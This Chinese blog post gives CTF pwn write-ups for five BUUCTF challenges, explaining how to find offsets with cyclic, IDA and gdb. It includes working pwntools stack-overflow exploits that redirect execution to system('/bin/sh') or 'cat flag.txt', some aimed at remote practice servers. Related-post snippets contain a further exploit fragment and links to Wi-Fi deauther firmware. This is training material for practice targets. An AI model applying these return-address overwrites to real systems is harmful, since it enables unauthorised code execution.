pwn_recording(buuctf2-6)

已于 2025-05-17 09:23:55 修改
阅读量747 收藏 6
点赞数 9
CC 4.0 BY-SA版权
分类专栏: Pwn 文章标签: linux 网络安全 python 笔记
于 2025-04-23 00:08:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xcellencw/article/details/147385079

2.rip(栈对齐)

checksec

IDA64打开,shift+F12查看有system函数和/bin/sh

如何查看他们的位置呢?

system位置

直接在IDA里边查看 system 0x401040

或者gdb 命令:info functions system

/bin/sh位置

点击fun函数进去 /bin/sh 0x40118A 

ROPgadget --binary rip --string '/bin/sh' 或者 search ".bin/sh"查的是静态地址

以下才是它libc中的地址(动态)

填充数据如何算呢?这里用cyclic

填充方法一

①cyclic 200,先创建200个数据;

②pwndbg > run ,在pwndbg中运行程序;运行到如下图所示

③cyclic -l 0x6161616161616461  即可得到23

填充方法二

但是在找填充数据时 在IDA中看 0xF+8

然后这里可能涉及到栈对齐问题

from pwn import *

sh = process("./rip")
#sys_addr = 0x401040 #这是system函数plt表的位置
ret = 0x401016
fun = 0x401186
offset = 23

'''输入payload来进行操作以拿到程序的shell,b'a'表示二进制的字母a。栈填满了之后,加上目标函数地址,就可以执行这个函数'''
payload = b'a'*offset
payload += p64(ret)
#payload += p64(sys_addr) 
payload += p64(fun) 

sh.sendline(payload)
sh.interactive()

上述ret地址是通过ROP找到的,ROPgadget --binary rip --only "ret"

事实上这里也可以直接溢出到/bin/sh

from pwn import *

sh = process("./rip")

binsh = 0x40118A
offset = 23

payload = b'a'*offset

payload += p64(binsh) 

sh.sendline(payload)
sh.interactive()

3.warmup_csaw_2016

发现flag.txt,双击

或者在主函数找到

栈溢出之后,直接执行system("cat flag.txt")。打远程能得flag

from pwn import *

#sh = process("./warmup_csaw_2016")
sh =remote ("node5.buuoj.cn",27926)

payload = b'a'*72 + p64(0x40060D)
# 栈溢出之后,直接执行system("cat flag.txt")

sh.sendline(payload)
sh.interactive()

4.ciscn_2019_n_1

这个不能用cyclic,IDA可以看

此题打开之后,gets泄露,于是用了老办法,垃圾数据用cyclic填了56个(0x30+8),在之后就执行v2 == 11.28125,发现并不行。

方法一:

再回头来看gets泄露的参数v1,其在执行v2前只填了44个junk数据,这44个空间一满就可以溢出了

再就是把这个浮点数转化为Hex。这个也是远程能打通

from pwn import *

sh=remote("node5.buuoj.cn",26953)

payload=b'a'*44+p64(0x41348000)

sh.sendline(payload)

sh.interactive()

方法二:

像之前的一样,将其覆盖到返回地址,填充56 (0x30 + 8)junk

from pwn import *

sh=remote("node5.buuoj.cn",26194)
elf = ELF('./ciscn_2019_n_1')

padding = 0x30 + 8
sys_addr = 0x4006BE # 这里是cat /flag
payload=b'a'*padding+p64(sys_addr) 

sh.sendline(payload)

sh.interactive()

5.pwn1_sctf_2016

这个题用了elf找自动找函数位置

IDA32打开,main函数点进去,vuln() 即vulnerable易受攻击的

fgets函数没问题(代替了gets这一危险函数);后面有个strcpy函数这也是个危险函数,这里是把v0的内容复制到s里面

s参数点进去看看,在栈中的位置为0x3C

覆盖s的内容到r返回地址,则需要0x3C+4,即64个字符

这64个字符如何构成呢,分析vuln()函数中间那一段C++,可知,输入I(1个字符)会返回you(3个字符),则可以构造payload = b'I'*21 + b'a'*1

再shift+F12,发现一个cat flag.txt,点进去

Ctrl + X,即可找到这一命令地址 0x08048F13

如果拿不准找system地址(本题可以看到有get_flag),也可以通过以下exp中的方式(elf)

from pwn import *

sh = remote ('node5.buuoj.cn',27790)
#sys_addr = 0x08048F13 #直接找的

#通过以下方式自动找寻system的地址(本题为get_flag)
elf = ELF("./pwn1_sctf_2016")
sys_addr = elf.symbols["get_flag"]

payload = b'I'*21 + b'a'*1
payload += p32(sys_addr)

sh.sendline(payload)
sh.interactive()

6.jarvisoj_level0

这个题写了个动调的方法

checksec

这里介绍几种确定填充(junk)数据的方法

填充方法一

①像上边(2.rip(栈对齐))说的cyclic,具体见上边

填充方法二

②在vulnerable函数中直接看

查看变量buf,要执行到r返回地址,就得覆盖128+8个字符

填充方法三

③gdb动态调试

下一个断点,我就下在了main(b main);'r'运行;步过(‘n’)到功能函数(vulnerable_function);然后步入(‘s’);直到read函数,再‘n’;‘n’之后随便输入几个a;

回车之后再查看一下栈空间 stack 20

rbp-rsp是0x80个字符(128),然后到返回地址还需要覆盖8个字符(如上图所示)

远程可以

from pwn import *

sh = remote ('node5.buuoj.cn',28524)

#通过这种方式自动找寻system的地址
elf = ELF("./level0")
sys_addr = elf.symbols["callsystem"]

payload = b'a'*136
payload += p64(sys_addr)

sh.sendline(payload)
sh.interactive()

这里直接用的pwntools工具,找system地址,sys_addr = elf.symbols["callsystem"]

攻防世界:PWN()
m0_53932372的博客
12-30 1707
cgpwn2 32bit,漏洞:栈溢出 这很简单,第一次输入参数“/bin/sh”到一个bss区域,第二次利用栈溢出getshell exp: from pwn import * io = remote('111.200.241.244',61742) sys_addr = 0x08048420 io.recvuntil("your name\n") io.sendline("/bin/sh") bin_sh_addr =0x0804A080 io.recvuntil("leave some messag
buuctf——pwn之旅(持续更新)
qq_42988973的博客
12-16 685
buuctf-pwn 的一些wp
pwn入门小技巧
qq_36918532的博客
05-24 3367
目前我所遇到的一些pwn的做技巧 我也是偶尔玩玩ctf,所以也不会很难的,所以这篇主要是帮助刚开始学习的人学习吧 首先知识点包括:栈,堆,整数溢出,格式化字符串 目前ctf的越来越偏向于实际,有的会使用刚刚爆出来的CVE漏洞的,所以不能只局限于glibc 所以可以大体分为两类把:libc,kernel 栈利用:有ret2libc,ret2shellcode,ret2text,ropchain,ret2syscall,brop,srop等等,当然有时候还会有seccomp的只能使用ORW系统调用 堆利用:
pwn记录
Sean_summer的博客
03-18 750
当程序存在fork函数并触发canary时,__ stack_chk_fail函数只能关闭fork函数所建立的进程,不会让主进程退出,所以当存在大量调用fork函数时,我们可以利用它来一字节一字节的泄露。fork()最大的特点就是一次调用,两次返回,两次返回主要是区分父子进程,因为fork()之后将出现两个进程,所以有两个返回值,父进程返回子进程ID,子进程返回0。通过复制的方式创建一个进程,被创建的进程称为子进程,调用进程称为父进程,复制的子进程是从父进程fork()调用后面的语句开始执行的。
PWN入门——BUUCTF(1-4)
ChenD的学习笔记
09-23 871
最近为了学校组织的ctf比赛才开始接触pwn的刚刚做了十多道现在来记录一下,记录完了接着学后面贼难的内容!
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF PWN-----第1:test_your_nc
热门推荐
bing_Max的博客
08-27 1万+
buuoj-----第四:ciscn_2019_n_1 前言 简单记录一下pwn的过程 首先checkesc ,检测文件的保护机制. 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1175
利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF PWN 1-15
农夫果园好好喝的博客
08-21 2450
经典栈溢出漏洞。
BUUCTF PWN记录 (未完待续)
qq_41071646的博客
08-01 2120
最近找了一个新的CTF比赛平台 但是不知道为啥pwn的服务器总是连不上, 所以到时候还是直接本地打 默认2.23 so 如果 有高版本的话 我再切换,,, 逆向的话 先等等吧,,,先不。。等有空了再 第一 连上就有flag的pwn 直接 运行就有权限,。 第二 RIP覆盖一下 这个没有任何保护 直接 覆盖rip就可以了 from pwn import * conte...
Pwn记录(不停更新)
qq_66013948的博客
06-23 499
​ 发现了个事儿,for循环会执行两次,所以这里采用第一次不溢出,通过格式化字符串漏洞对Canary的值进行泄露,之后就可以在合适的地方填入canary的值来绕过canary保护了。​ 之后就是具体进行溢出了,计算溢出的长度也比较简单,这里直接上答案吧,116字节,不过,第100到104为canary的值。​ 根据这俩进行计算,可得到偏移,结果是0x7c/4=31。​ 除了NX之外,似乎就只有 Canary了。​ 因此,思路就很明确了。
PWN记录(1)--ciscn_2019_n_5
小心信科理化声
05-10 409
这是第一篇的记录,从ret2text开始起 0x1 程序分析 先checksec 一下 64位的小端序,NX没开启,妥妥的写shellcode 拖入IDA中查看一下 main函数如下 可以看到gets(text)有明显的溢出 然后还可以看到关键的read函数,可以做libc泄露用,先留着 然后查找一下有没有能用到的system函数和binsh 无system函数 估计也没有binsh了 咋办呢>? 看一下有没有可读可写可执行的字段呢? 看看这里的两个变量:name\text 存在!
攻防世界pwn笔记(实时更新)
zzh258369的博客
02-27 657
学了点逆向又来接触点pwn方面的,现在学习效率有点低下,需要再不断提高Pwn是指攻击者通过漏洞利用技术,获取目标系统或程序的控制权,进而执行任意代码、窃取数据等恶意操作,以达到破坏系统安全、获取敏感信息等目的的行为过程。比如攻击者利用软件中的缓冲区溢出漏洞,改写程序的执行流程,让程序执行攻击者预先准备好的恶意代码。具体相关描述后面遇到会详细解释作为引导模式的第一,一看难度竟然是7,一下子就慌了,但是事实上这道很简单下载好后放入虚拟机里,先简单逆向分析一下,没发现任何东西其实就简单linux指令。
pwn入门——starting(1)
qq_44302282的博客
05-05 396
level0 目来源:攻防世界—level0 链接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5053&page=1 1、首先,执行基本步骤(前面已经说过了),看图 2、 接下来,打开64位的ida 3、在左边的函数窗口里面找到main函数,打开它,tab键可以切换反...
NSSCTF PWN方向记录
CyhStyrl的博客
04-03 955
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
pwn入门——starting
qq_44302282的博客
05-04 1803
运行就能拿到shell呢,真的 目来源:攻防世界------运行就能拿到shell呢,真的 链接:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5049&page=1 先从最简单的入手(虽然我先的不是这道,emmmm) (作为小白,刚开始的这些步骤我真的不知道,所以我...
我又pwn了 ——篇 ciscn_s_3
m0_64195960的博客
08-08 759
ret2csu&SROP
void HAL_TIM_IC_CaptureCallback(TIM_HandleTypeDef *htim) { if(htim->Instance == TIM2) { if(htim->Channel == HAL_TIM_ACTIVE_CHANNEL_2) { PWN_IN_RATIO_VALUE_A = 20000-HAL_TIM_ReadCapturedValue(htim,TIM_CHANNEL_2); TIM1->CCR1 = PWN_IN_RATIO_VALUE_A-200; } } if(htim->Instance == TIM3) { if(htim->Channel == HAL_TIM_ACTIVE_CHANNEL_2) { PWN_IN_RATIO_VALUE_B = 20000-HAL_TIM_ReadCapturedValue(htim,TIM_CHANNEL_2); TIM1->CCR2 = PWN_IN_RATIO_VALUE_B-200; } } }
最新发布
08-25
2. 使用DMA:对于高频率的捕获,可以考虑使用DMA来传输捕获值,避免频繁中断。 3. 双重缓冲:使用两个缓冲区交替存储捕获值,一个用于读取(处理),一个用于写入(捕获),这样可以避免数据竞争。 4. 状态机设计...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值